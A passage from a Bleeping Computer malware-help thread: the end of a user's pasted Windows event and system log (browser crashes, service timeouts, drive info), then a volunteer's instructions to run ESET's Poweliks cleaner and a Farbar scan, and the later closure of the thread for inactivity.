Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c74
Faulting process id: 0x69b8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 01:19:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x505c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 10:05:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0x57a8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 06:02:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x000b18b2
Faulting process id: 0x55d0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/01/2014 05:48:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0x458c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
 
System errors:
=============
Error: (11/04/2014 00:32:27 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/04/2014 00:32:25 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:31:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Multimedia Class Scheduler service failed to start due to the following error: 
%%1053
 
Error: (11/04/2014 00:31:55 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the MMCSS service.
 
Error: (11/04/2014 00:31:25 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:30:53 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (11/04/2014 00:26:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/04/2014 00:25:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/04/2014 00:24:44 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
Error: (11/04/2014 00:23:48 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Data Broker for C:\Med\Meddata service depends on the Update Manager for C:\Med\Meddata service which failed to start because of the following error: 
%%1069
 
 
Microsoft Office Sessions:
=========================
Error: (06/18/2012 02:48:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 12315 seconds with 660 seconds of active time.  This session ended with a crash.
 
Error: (04/06/2012 04:46:02 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6612.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3383 seconds with 720 seconds of active time.  This session ended with a crash.
 
Error: (07/29/2011 10:05:40 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 1271 seconds with 420 seconds of active time.  This session ended with a crash.
 
Error: (03/09/2011 11:59:52 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 4397 seconds with 180 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-10-29 08:43:20.914
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2013-10-29 08:43:20.773
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2012-05-09 10:14:44.241
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2012-05-09 10:14:44.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-04-20 14:59:18.970
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-04-20 14:59:18.346
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:25:11.101
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:25:11.054
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:16:32.124
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\sirenacm.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-03-30 12:16:32.077
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7500 @ 2.93GHz
Percentage of memory in use: 65%
Total physical RAM: 2012.8 MB
Available physical RAM: 704.28 MB
Total Pagefile: 4025.61 MB
Available Pagefile: 1832.07 MB
Total Virtual: 2047.88 MB
Available Virtual: 1898.18 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:223.01 GB) (Free:142.75 GB) NTFS
Drive e: (Seagate Backup Plus Drive) (Fixed) (Total:931.51 GB) (Free:848.42 GB) NTFS
Drive f: (VMWARE) (Removable) (Total:1.91 GB) (Free:1.75 GB) FAT
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 232.8 GB) (Disk ID: EC0328C2)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=9.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=223 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 13BE7FB1)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: 88470719)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=06)
 
==================== End Of Log ============================

 



BC AdBot (Login to Remove)

 


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:29 PM

Posted 09 November 2014 - 12:49 PM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully: :exclame:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1
logo.png
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click the 3.png to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
1.png
2.png

Step 2

Please run a FRST scan. This will help us diagnose your problem.

frst.pngfrstscan.png
Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#3 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:29 PM

Posted 12 November 2014 - 01:32 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#4 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:29 PM

Posted 14 November 2014 - 08:32 AM

Due to the lack of feedback, this topic is now closed.<br /><br />In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days. <br><br>Please include a link to your topic in the Private Message. Thank you.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users